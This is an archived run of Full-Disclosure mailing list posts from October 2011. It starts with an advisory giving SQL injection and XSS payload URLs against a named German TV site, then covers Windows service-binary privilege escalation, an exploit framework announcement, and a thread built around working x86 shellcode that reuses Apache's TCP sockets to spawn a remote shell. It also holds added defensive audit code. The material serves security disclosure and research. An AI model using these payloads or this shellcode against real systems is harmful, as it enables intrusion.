7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27,28,29,30,31,32,33,34,35,36--+

1.2
http://tvtotal.prosieben.de/tvtotal/suche/?query=;<IFRAME
SRC=javascript:alert('X4lt');></IFRAME>&x=13&y=18


2.1

URL:http://tvtotal.prosieben.de
PATH:/tvtotal/videos/
File:index.html
Para:?list=tag&tag=stefan_raab&tagId='

http://tvtotal.prosieben.de/tvtotal/videos/index.html?list=tag&tag=stefan_raab&tagId=18
and 1=2--


3.1

URL:http://tvtotal.prosieben.de
PATH:/tvtotal/community/forum/
File:account.php
Para:?u=-1'

http://tvtotal.prosieben.de/tvtotal/community/forum/account.php?u=-1
order by 1--


Risk:
=
The security risk of the SQL injection vulnerabilities is estimated as
critical.


Credits:

Vulnerability Research Laboratory


Disclaimer:
===
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect,
incidental, consequential loss of business profits or special damages,
even if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some states do not allow the exclusion or
limitation of liability for consequential or incidental damages so the
foregoing limitation may not apply. Any modified copy or reproduction,
including partially usages, of this file requires authorization from
Vulnerability-Lab. Permission to electronically redistribute this alert
in its unmodified form is granted. All other rights, including the use
of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011|Vulnerability-Lab


Comment: Thanks for the free tickets to tvtotal ;) by f0x

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Georgi Guninski
On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote:
 What tears? I don't even use those providers.

What a nice drivel in this thread :)))

btw, are Anonymous affiliated/supporting the usa protests aka 
OccupyWallStreet?

all the usa needs is a revolution just before they go bankrupt :)

-- 
joro



Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-10-04 Thread David Amistoso
Unfortunately, on W7 and any other box with proper restrictions, you need to
run that command as admin to get the full result set.

If you are an unprivileged user looking for a process to escalate to:
tasklist /v /fi "USERNAME ne %USERNAME%"
or
tasklist /v | find "Unknown N/A"

Will give you a good place to start looking.

On Tue, Sep 27, 2011 at 1:25 AM, Gary Slavin ga...@sec-1.com wrote:

  the trick is to find one that is writable while logged in as a less
 priveleged user and then overwrite the executable. Anti virus executables
 are typically a good place to start :)

 tasklist /fi "USERNAME eq NT AUTHORITY\SYSTEM"
 Image Name                     PID Session Name     Session#    Mem Usage
 ========================= ======== ================ =========== ============
 System Idle Process              0 Console                    0         28 K
 System                           4 Console                    0        236 K
 smss.exe                       704 Console                    0        388 K
 csrss.exe                      752 Console                    0      4,032 K
 winlogon.exe                   776 Console                    0      2,904 K
 services.exe                   820 Console                    0      4,612 K
 lsass.exe                      832 Console                    0      1,724 K
 ati2evxx.exe                   980 Console                    0      2,676 K
 svchost.exe                   1020 Console                    0      5,948 K
 svchost.exe                   1200 Console                    0     23,100 K
 DLService.exe                 1484 Console                    0      7,856 K
 spoolsv.exe                   1848 Console                    0      6,992 K
 schedul2.exe                  2028 Console                    0      2,036 K
 inetinfo.exe                   228 Console                    0     10,484 K
 mnmsrvc.exe                    364 Console                    0      3,436 K
 rundll32.exe                   352 Console                    0      3,168 K
 SAVAdminService.exe            356 Console                    0      2,548 K
 ManagementAgentNT.exe          580 Console                    0      4,624 K
 ALsvc.exe                      748 Console                    0        944 K
 RouterNT.exe                  1004 Console                    0      4,884 K
 vsAOD.Exe                     1868 Console                    0      4,224 K
 C:\Documents and Settings\pentest

 
 From: Steve Syfuhs [st...@syfuhs.net]
 Sent: 26 September 2011 19:09
 To: Madhur Ahuja; security-bas...@securityfocus.com;
 full-disclosure@lists.grok.org.uk
 Subject: RE: [Full-disclosure] Privilege escalation on Windows using
 Binary Planting


 Well yeah, if the system that's designed to protect you isn't functioning,
 then you aren't protected and all sorts of bad things can happen.

 When services starts up, the root service executable looks through a
 registry key to find all the services that should be run. It then executes
 the value in the key relative to each service based on which account is
 specified.  There is no signature checking or anything funky like that going
 on. If the path stored in the registry entry is a valid executable, it will
 get executed.

 It is up to the installer to make sure that the service cannot be replaced.
 This is done by storing it in Program Files, or one of the other recommended
 locations, which only administrators can access by default. If the
 executable is stored in another location, it is still up to the installer to
 set up proper file permissions. Further, only an administrator should be
 able to start or stop the service.

 All of this is up to the installer, and the service itself to handle.

 If a service or installer deviates from the prescribed design set out by
 Microsoft, is it really Windows' fault that it happened? Not really. So, yes
 you could escalate privilege through this method, but really the failure is
 by the developer of the service, or by the developer of the installer.

 -Original Message-
 From: listbou...@securityfocus.com [mailto:listbou...@securityfocus.com]
 On Behalf Of Madhur Ahuja
 Sent: Sunday, September 25, 2011 2:31 PM
 To: security-bas...@securityfocus.com; full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Privilege escalation on Windows using Binary
 Planting

 Imagine a situation where I have a Windows system with the restricted user
 access and want to get the Administrator access.

 There are many services in Windows which run with SYSTEM account.

 If there exists even one such service whose executable is not protected by
 Windows File Protection, isn't it possible to execute malicious code (such
 as gaining Administrator access) simply by replacing the service executable
 with malicious one and then restarting the service.

 As a restricted user, what's stopping me to do this ?

 Is there any integrity check performed by services.msc or service itself
 before executing with SYSTEM account ?

 Madhur

 

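An added audit check for the point made in the thread above, that the file permissions on a service's binary are all that keep a standard user from replacing a SYSTEM service: this script (example code, not from the thread) lists services whose executable, or the directory holding it, grants write access to a low-privilege principal. It assumes Windows PowerShell 3 or later (for Get-CimInstance) and is best run elevated so every service path is readable.

```powershell
# Added example (not from the thread): audit service binaries for write access
# by low-privilege principals, the condition behind the binary-planting
# escalation discussed above. Assumes Windows PowerShell 3+; run elevated.

# Principals every standard user belongs to. An Allow ACE granting any write
# right to one of these lets a standard user tamper with the service binary.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow changing, replacing or renaming the file (or entries of
# its parent directory).
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, TakeOwnership, ChangePermissions'

function Get-ServiceBinaryPath {
    # Pull the executable out of Win32_Service.PathName, which may be quoted
    # and may carry arguments, e.g.  "C:\Program Files\Foo\foo.exe" -service
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }   # unquoted path
    return ($PathName -split ' ')[0]
}

function Get-LowPrivWriteAce {
    # Return the first Allow ACE on $Path that grants a write right to a
    # low-privilege principal, or $null if none exists or the ACL is unreadable.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # -band on the enum values. Generic rights (shown as large raw
        # integers) are not decoded here and would need a separate check.
        if (($ace.FileSystemRights -band $WriteRights) -ne 0) { return $ace }
    }
    return $null
}

function Find-WritableServiceBinaries {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        # Check the file itself and the directory it lives in: a writable
        # directory can let a user add or rename entries next to the binary.
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            $ace = Get-LowPrivWriteAce $target
            if ($ace) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName        # e.g. LocalSystem
                    StartMode = $svc.StartMode
                    Target    = $target
                    GrantedTo = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

# Anything listed here should have its ACL tightened so that only
# Administrators and SYSTEM can write, or the binary should be moved under
# Program Files or another admin-only location, as the thread describes.
Find-WritableServiceBinaries | Format-Table -AutoSize
```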
[Full-disclosure] New open source Security Framework

2011-10-04 Thread noreply
Exploit Pack is an open source security framework developed by Juan 
Sacco. It combines the benefits of a
Java GUI, Python as engine and well-known exploits made by users. It 
has a module editor to make the task of
developing new exploits easier, instant search and XML-based modules.

This open source project comes to fill a need: a high quality framework 
for exploits and security researchers
with a GPL license and Python as the engine for its modules.

GPL license to ensure the code will always be free
Instant search built-in for easy access to modules
Module editor that allows the user to create custom exploits
Modules use XML DOM, really easy to modify
Python as engine because it's the language most used in security-related 
programming

We are actually working with a social code network; to participate in 
this project you will only need a GitHub
account.

Also, I am looking for financial support to keep me coding. If you want 
to be part of this open source project
or just want to collaborate with me:

Please reply to jsa...@exploitpack.com

Why don’t you download and give it a try right now? While downloading, 
you may watch this quick video on YouTube!

Video: http://www.youtube.com/watch?v=cMa2OrB7b5A
Website: http://www.exploitpack.com


Re: [Full-disclosure] New open source Security Framework

2011-10-04 Thread ctruncer
So this is from the same people that developed Insect Pro?


Chris




On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote:
 Exploit Pack is an open source security framework developed by Juan
 Sacco. It combines the benefits of a
 JAVA GUI, Python as Engine and well-known exploits made by users. It
 has a module editor to make the task of
 developing new exploits easier, Instant Search and XML-based modules.

 This open source project comes to fill a need, a high quality 
 framework
 for exploits and security researchers
 with a GPL license and Python as engine for its modules.

 GPL license to ensure the code will always be free
 Instant search built-in for modules easy access
 Module editor that allows the user to create custom exploits
 Modules use XML DOM, really easy to modify
 Python as Engine because its the language more used on security 
 related
 programming

 We are actually working with social code network, to participate in
 this project you will only need a GitHub
 account.

 Also, I am looking for financial support to keep me coding. If you 
 want
 to be part of this open source project
 or just want to collaborate with me:

 Please reply to jsa...@exploitpack.com

 Why don’t you download and give it a try right now? While 
 downloading,
 you may watch this quick video on YouTube!

 Video: http://www.youtube.com/watch?v=cMa2OrB7b5A
 Website: http://www.exploitpack.com



Re: [Full-disclosure] New open source Security Framework

2011-10-04 Thread Justin Klein Keane


insecurityresearch.com (the Insect PRO site) does in fact seem to
redirect to exploitpack.com - nice catch Chris.

Justin Klein Keane
http://www.MadIrish.net

The digital signature on this e-mail may be confirmed using the
PGP key located at: http://www.madirish.net/gpgkey

On 10/04/2011 02:46 PM, ctrun...@christophertruncer.com wrote:
 So this is from the same people that developed Insect Pro?
 
 
 Chris
 
 
 
 
 On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote:
 Exploit Pack is an open source security framework developed by
 Juan Sacco. It combines the benefits of a JAVA GUI, Python as
 Engine and well-known exploits made by users. It has a module
 editor to make the task of developing new exploits easier,
 Instant Search and XML-based modules.
 
 This open source project comes to fill a need, a high quality 
 framework for exploits and security researchers with a GPL
 license and Python as engine for its modules.
 
 GPL license to ensure the code will always be free Instant search
 built-in for modules easy access Module editor that allows the
 user to create custom exploits Modules use XML DOM, really easy
 to modify Python as Engine because its the language more used on
 security related programming
 
 We are actually working with social code network, to participate
 in this project you will only need a GitHub account.
 
 Also, I am looking for financial support to keep me coding. If
 you want to be part of this open source project or just want to
 collaborate with me:
 
 Please reply to jsa...@exploitpack.com
 
 Why don’t you download and give it a try right now? While 
 downloading, you may watch this quick video on YouTube!
 
 Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website:
 http://www.exploitpack.com
 
 


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread halfdog

Just for those who want to build their own apache shell code for
testing purposes, this snip might be of some use. It uses the still
open tcp connections to the server to spawn the shells, so that no
backconnect is needed. Of course, it does not give remote root but
only httpd user privs. And you should send exec 1>&0 as first
command if you want to see remote shell stdout.


Are there any ideas how to make the code more robust (currently
raciness due to frequent syscalls is problematic), smaller or add
features (I thought of using the libc GOT, but this made code larger and
I do not know if that would make code much more portable)?


PS: There is no use to compile or run it, it is just embedded into a .c
file for compilation (too lazy to look up gcc args for .S assembly)
before insertion into vectors.

-- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
/** This software is provided by the copyright owner as is to
 *  study it but without any expressed or implied warranties, that
 *  this software is fit for any other purpose. If you try to compile
 *  or run it, you do it solely on your own risk and the copyright
 *  owner shall not be liable for any direct or indirect damage
 *  caused by this software.
 *
 *  Copyright (c) 2011 halfdog me (%) halfdog.net
 *
 *  Compile, cut shellcode from hex between 4141 and 9090
 *
 *  gcc -g -o ForkPayload ForkPayload.c
 */

#include <stdio.h>
#include <sys/mman.h>

int main(int argc, char **argv) {
  int	*address;
  int	maddr,result;

  address=mmap((void*)(0x4000), 120,
      PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  fprintf(stderr, "Memory at 0x%x\n", (int)address);

  mprotect((void*)((int)(address)+(116)),
      (112), PROT_EXEC|PROT_READ|PROT_WRITE);

  maddr=*((int*)(((int)mprotect)+2)); // offset entry
  maddr=*((int*)(maddr))+1; // maddr offset
  fprintf(stderr, "mprotect 0x%x\n", maddr);

  asm volatile (
    // Start marker
    "pushl 0x41414141;"

    // Stack still contains old return address in mprotect. Store it in
    // ebx, since ebx is not modified during following syscalls
    "movl -0xc(%%esp),%%ebx;"

    // Spread the stack layout otherwise mpm-worker syscall will crash
    // due to using same stack memory in multiple threads. This is
    // still racy, but risk for context switch between addl and pop
    // is very slim
    "lea -0x38(%%esp),%%esp;"
    "addl $0x40,(%%esp);"
    "popl %%esp;"

    "xorl %%esi,%%esi;"   // stdin of shell
    "xorl %%edi,%%edi;"
    // First fd to dup, usually mpm tcp socket are in range 0x10 - 0x20,
    // depending on how many logfiles running or modules have open fds.
    // Use a higher value when apache has more fds. Caveat: value too high
    // might result in other mpm-thread SEGV before this thread can do
    // his first fork.
    "add $0x22,%%edi;"

    "forkloop:;"
    "dec %%edi;"
    "jz endloop;"

    "movl %%edi,(%%esp);" // fd
    "movl %%esi,0x4(%%esp);" // stdin
    // load dup2 addr rel to mprotect, use lea with negative value to
    // stay 0-byte free
    // print /x *dup2 - *mprotect - 25
    "lea 0x3aa7(%%ebx),%%eax;"
    // dup2 fd to stdin: leaves ebx intact
    "call *%%eax;"
    // Just test if dup2 was successful, telling us that this is a valid
    // fd. It does not matter if shell is started on logfile-fd, this
    // will just leave a dead shell
    "test %%eax,%%eax;"
    "jnz forkloop;"

    // load fork addr rel to mprotect:
    // print /x *__libc_fork - *mprotect - 25
    "lea 0xfffcc207(%%ebx),%%eax;"
    "call *%%eax;" // fork
    "test %%eax,%%eax;" // fork failed or in parent process?
    "jnz forkloop;"

    // Replace with heap target pos after compile, should point to
    // apr_memnode_t + 0x8 + n*0x100 to have correct alignment. Just
    // insert 0-bytes in the otherwise 0-byte-less heap data
    "movl $0xade04008,%%eax;"
    "movl %%esi,0x7(%%eax);"
    "movl %%eax,(%%esp);" // program name
    "movl %%eax,0x8(%%esp);" // program name
    "lea 0x8(%%esp),%%eax;"
    "movl %%eax,0x4(%%esp);" // arglist
    "movl %%esi,0xc(%%esp);" // arg end

    // load execv addr rel to mprotect:
    // print /x *execv - *mprotect - 25
    "lea 0xfffcc6a7(%%ebx),%%eax;"
    // execv
    "call *%%eax;"   // exec
    "endloop:;"
    "jmp endloop;"

    "jmp forkloop;"

    "nop;"
    "nop;"
    "nop;"
    "nop;"
    "pushl 0x42424242;"
    : // output
    : "m"(maddr), "m"(result) // input (1)
    : "%ebx", "%edx", "%edi"   // clobbered registers
  );

  return(0);
}

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
Are there any ideas how to make the code more robust (currently
raciness due to frequent syscalls is problematic), smaller or add
features (I thought using the libc GOT, but this made code larger and
I do not know if that would make code much more portable)?

What about using libcurl/curlsetopt_url and the other curl options





On 5 October 2011 08:26, halfdog m...@halfdog.net wrote:


 Just for those, who want to build their own apache shell code for
 testing purposes, this snip might be of some use. It uses the still
 open tcp connections to the server to spawn the shells, so that no
 backconnect is needed. Of course, it does not give remote root but
 only httpd user privs. And you should send exec 1>&0 as first
 command if you want to see remote shell stdout.


 Are there any ideas how to make the code more robust (currently
 raciness due to frequent syscalls is problematic), smaller or add
 features (I thought using the libc GOT, but this made code larger and
 I do not know if that would make code much more portable)?


 PS: There is no use to compile or run it, it is just embedded into .c
 file for compilation (too lazy to look up gcc args for .S assem)
 before insertion into vectors.

 --
 http://www.halfdog.net/
 PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee



Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
Supporting it would then mean, i guess there would be some kind of neat
cyber attacks happening on
wall street major shareholders :P or  is it peaceful, sit in like this time
;P
hehe..



On 5 October 2011 01:34, Laurelai Storm laure...@oneechan.org wrote:

 I believe they are supporting it.
 On Oct 4, 2011 9:29 AM, Georgi Guninski gunin...@guninski.com wrote:
  On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote:
  What tears? I don't even use those providers.
 
  What a nice drivel in this thread :)))
 
  btw, are Anonymous affiliated/supporting the usa protests aka
 OccupyWallStreet?
 
  all the usa needs is a revolution just before they go bankrupt :)
 
  --
  joro



Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Kai
 Hi halfdog,

 Just for those, who want to build their own apache shell code for
 testing purposes, this snip might be of some use. It uses the still
 open tcp connections to the server to spawn the shells, so that no
 backconnect is needed. Of course, it does not give remote root but
 only httpd user privs. And you should send exec 1>&0 as first
 command if you want to see remote shell stdout.

 wasn't that bug fixed long ago? https://bugs.php.net/bug.php?id=38915 
 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425
 sorry if I'm talking about a different thing.

-- 
 Cheers,

 Kai



Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Andrew Farmer
On 2011-10-04, at 02:43, Darren Martyn wrote:
 Is there actually a non backdoored variant of said code? I have not seen any
 CVE mentioning that exploit so I was naturally wondering.

You are assuming that there is some substance to the code *besides* being a 
trojan/backdoor. Your assumption is mistaken -- there's no substance to it at 
all.


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Andrew Farmer
On 2011-10-04, at 14:39, Kai wrote:
 Hi halfdog,
 
 Just for those, who want to build their own apache shell code for
 testing purposes, this snip might be of some use. It uses the still
 open tcp connections to the server to spawn the shells, so that no
 backconnect is needed. Of course, it does not give remote root but
 only httpd user privs. And you should send exec 1>&0 as first
 command if you want to see remote shell stdout.
 
 wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 
 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425
 sorry if i'm talking about different thing.

It's a generic method of getting a shell set up once you have code execution, 
not an exploit for any specific bug.


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
There are ways to make it *say* things, like show system info etc on stdout,
without using that bug.. look up a decent connectback shell, most perl ones
have fine stdin/stdout and use printf or other means..


On 5 October 2011 08:39, Kai k...@rhynn.net wrote:

  Hi halfdog,

  Just for those, who want to build their own apache shell code for
  testing purposes, this snip might be of some use. It uses the still
  open tcp connections to the server to spawn the shells, so that no
  backconnect is needed. Of course, it does not give remote root but
  only httpd user privs. And you should send exec 1>&0 as first
  command if you want to see remote shell stdout.

  wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915
  --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425
  sorry if i'm talking about different thing.

 --
  Cheers,

  Kai



Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
could be used as a very handy 'bind' shell tho...


On 5 October 2011 08:51, Andrew Farmer andf...@gmail.com wrote:

 On 2011-10-04, at 14:39, Kai wrote:
  Hi halfdog,
 
  Just for those, who want to build their own apache shell code for
  testing purposes, this snip might be of some use. It uses the still
  open tcp connections to the server to spawn the shells, so that no
  backconnect is needed. Of course, it does not give remote root but
  only httpd user privs. And you should send exec 1>&0 as first
  command if you want to see remote shell stdout.
 
  wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915
  --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425
  sorry if i'm talking about different thing.

 It's a generic method of getting a shell set up once you have code
 execution, not an exploit for any specific bug.


Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread halfdog

Hello Kai,
Kai wrote:
 Hi halfdog,
 
 Just for those, who want to build their own apache shell code
 for testing purposes, this snip might be of some use. It uses the
 still open tcp connections to the server to spawn the shells, so
 that no backconnect is needed. Of course, it does not give remote
 root but only httpd user privs. And you should send exec 1>&0
 as first command if you want to see remote shell stdout.
 
 wasn't that bug fixed a long ago?
 https://bugs.php.net/bug.php?id=38915 ---
 https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if
 i'm talking about different thing.

Thanks for the link. I have to look into it closer, perhaps my code is
just working because I dup2 the fd to stdin before exec, which might
get rid of the FD_CLOEXEC. At least in tests, where I injected code
into mpm-worker on x86 (32bit) using gdb and other methods, it
succeeded in giving me remote shell.

hd

-- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee



Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread halfdog

halfdog wrote:
 Hello Kai, Kai wrote:
 Hi halfdog,
 
 Just for those, who want to build their own apache shell code 
 for testing purposes, this snip might be of some use. ...
 
 wasn't that bug fixed a long ago? 
 https://bugs.php.net/bug.php?id=38915 --- 
 https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if
 i'm talking about different thing.
 
 Thanks for the link. I have to look into it closer, perhaps my
 code is just working because I dup2 the fd to stdin before exec,
 which might get rid of the FD_CLOEXEC. At least in tests, where I 
 injected code into mpm-worker on x86 (32bit) using gdb and other 
 methods, it succeeded in giving me remote shell.

Yes, it's the dup2 that does the trick:

man:   dup, dup2 - duplicate a file descriptor

The two descriptors do not share file descriptor flags (the
close-on-exec flag). The close-on-exec flag (FD_CLOEXEC; see fcntl(2))
for the duplicate descriptor is off.

That is why the tcp-sock fd stays alive after execv("/bin/sh", ...)

hd

http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee

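The dup(2) behaviour halfdog's two replies rely on, as an added example that is not part of his posts: a descriptor carrying FD_CLOEXEC is closed across execv(), but the copy that dup2() makes starts with the flag clear and so survives. It uses only POSIX calls; a socketpair stands in for the server's TCP connection.

```c
/* Added example (not part of halfdog's posts): shows the dup(2) behaviour
 * the reply relies on. A descriptor carrying FD_CLOEXEC is closed across
 * execv(), but the copy produced by dup2() starts with the flag clear and so
 * survives. A socketpair stands in for the server's TCP connection; only
 * POSIX calls are used. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

/* 1 if fd has FD_CLOEXEC set, 0 if clear, -1 if fd is not open. */
int has_cloexec(int fd) {
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0) return -1;
    return (flags & FD_CLOEXEC) ? 1 : 0;
}

/* Mark fd close-on-exec (what a hardened server does with its listening
 * and accepted sockets). Returns the resulting flag state or -1. */
int set_cloexec(int fd) {
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0) return -1;
    if (fcntl(fd, F_SETFD, flags | FD_CLOEXEC) < 0) return -1;
    return has_cloexec(fd);
}

/* Build a close-on-exec socket, dup2() it onto target_fd (the payload in
 * the thread uses fd 0, the future shell's stdin) and record the flag on
 * both descriptors.
 * out[0] = flag on the original, out[1] = flag on the dup2() copy.
 * Returns 0 on success, -1 on failure. */
int cloexec_after_dup2(int target_fd, int out[2]) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    if (set_cloexec(sv[0]) != 1 || dup2(sv[0], target_fd) < 0) {
        close(sv[0]); close(sv[1]);
        return -1;
    }
    out[0] = has_cloexec(sv[0]);     /* 1: original would be closed by execv() */
    out[1] = has_cloexec(target_fd); /* 0: the copy survives execv() */
    close(sv[0]); close(sv[1]); close(target_fd);
    return 0;
}

int main(void) {
    int state[2];
    if (cloexec_after_dup2(20, state) != 0) { perror("cloexec_after_dup2"); return 1; }
    printf("original socket FD_CLOEXEC=%d, dup2() copy FD_CLOEXEC=%d\n",
           state[0], state[1]);
    return 0;
}
```

For defenders the consequence is that close-on-exec limits accidental descriptor inheritance but is not a boundary against code already running inside the process; what keeps the socket from reaching a shell is preventing that code execution in the first place.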


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Jeffrey Walton
On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote:
 http://vpn.hidemyass.com/vpncontrol/legal.html

 VPN Data

 What we store: Time stamp and IP address when you connect and
 disconnect to our service.

 ...

 Legalities

 Anonymity services such as ours do not exist to hide people from
 illegal activity. We will cooperate with law enforcement agencies if
 it has become evident that your account has been used for illegal
 activities.

 people should read the TOC, AUP and privacy policy especially if they
 are planning to use that service for illegal activities.

 As I mentioned before it is hard to expect that a VPN provider will
 risk his company for your $11.52/month, and maybe they would try it
 for some lesser case, but what Lulsec did was grant, so I'm not
 surprised that they bent.

Alleged

 On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote:
 maybe they are law abiding companies? :)

 Who were advertising themselves, and acting like they would NEVER do the
 dirty by handing over any payment records etc... wich is half the reason i
 believe the people use theose ones, advertising to protect you.. not to give
 your infos up, for really, no reason. as they did.
 Law abiding or not, then they should be advertising as a law abiding
 company, and not acting like some hackers-oparadise vpn service.
 xd


 On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote:

 On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote:
  On 10/3/2011 10:42 AM, Antony widmal wrote:
  Using an external VPN provider to cover your trace clearly shows your
  incompetency and your idiot assumption.
  Trying to blame the VPN provider rather than accepting your mistake
  and learning from it clearly show your 3 years old mentality.
 
  Also, could you please stop posting as GLOW Xd as well ?
  We do not need your schizophrenic script kiddie lolololol, xD,
  hugs,  spamming on this mailing list.
 
  You being on this mailing list is once again not the best idea.
 
  Thanks,
  Antony
  Actually XD and me are two different people. Second issues of privacy
  are always relevant, not understanding that law abiding individuals
  should always be concerned about companies that hand over personal info
  at the request of an authority figure are the ones with three year old
  mentalities.

 maybe they are law abiding companies? :)
 this whole fuss wouldn't have happened, if everybody could just stay a
 law abiding citizen.



Re: [Full-disclosure] New open source Security Framework

2011-10-04 Thread Mario Vilas
I don't think it's supposed to be a secret. There are also references to
Insect Pro in the source code:

https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/main/License.java

BTW, you gotta love the scanner :)

https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java

On Tue, Oct 4, 2011 at 9:31 PM, Justin Klein Keane jus...@madirish.net wrote:



 insecurityresearch.com (the Insect PRO site) does in fact seem to
 redirect to exploitpack.com - nice catch Chris.

 Justin Klein Keane
 http://www.MadIrish.net

 The digital signature on this e-mail may be confirmed using the
 PGP key located at: http://www.madirish.net/gpgkey

 On 10/04/2011 02:46 PM, ctrun...@christophertruncer.com wrote:
  So this is from the same people that developed Insect Pro?
 
 
  Chris
 
 
 
 
  On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote:
  Exploit Pack is an open source security framework developed by
  Juan Sacco. It combines the benefits of a JAVA GUI, Python as
  Engine and well-known exploits made by users. It has a module
  editor to make the task of developing new exploits easier,
  Instant Search and XML-based modules.
 
  This open source project comes to fill a need, a high quality
  framework for exploits and security researchers with a GPL
  license and Python as engine for its modules.
 
  GPL license to ensure the code will always be free Instant search
  built-in for modules easy access Module editor that allows the
  user to create custom exploits Modules use XML DOM, really easy
  to modify Python as Engine because its the language more used on
  security related programming
 
  We are actually working with social code network, to participate
  in this project you will only need a GitHub account.
 
  Also, I am looking for financial support to keep me coding. If
  you want to be part of this open source project or just want to
  collaborate with me:
 
  Please reply to jsa...@exploitpack.com
 
  Why don’t you download and give it a try right now? While
  downloading, you may watch this quick video on YouTube!
 
  Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website:
  http://www.exploitpack.com
 




-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New open source Security Framework

2011-10-04 Thread Travis Biehn
XML Modules? In *my* exploit pack?

-Travis


-- 
Twitter https://twitter.com/tbiehn |
LinkedIn http://www.linkedin.com/in/travisbiehn |
GitHub http://github.com/tbiehn | TravisBiehn.com http://www.travisbiehn.com

Re: [Full-disclosure] New open source Security Framework

2011-10-04 Thread Gino
On 10/4/11 12:44 PM, Mario Vilas wrote:
 I don't think it's supposed to be a secret. There are also
 references to Insect Pro in the source code:
 
 BTW, you gotta love the scanner :)
 
 https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java

Looks a bit (identical) to
http://www.vogella.de/articles/EclipseJobs/article.html#progressreport

:p



Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Jeffrey Walton
On Mon, Oct 3, 2011 at 5:48 PM, Laurelai laure...@oneechan.org wrote:
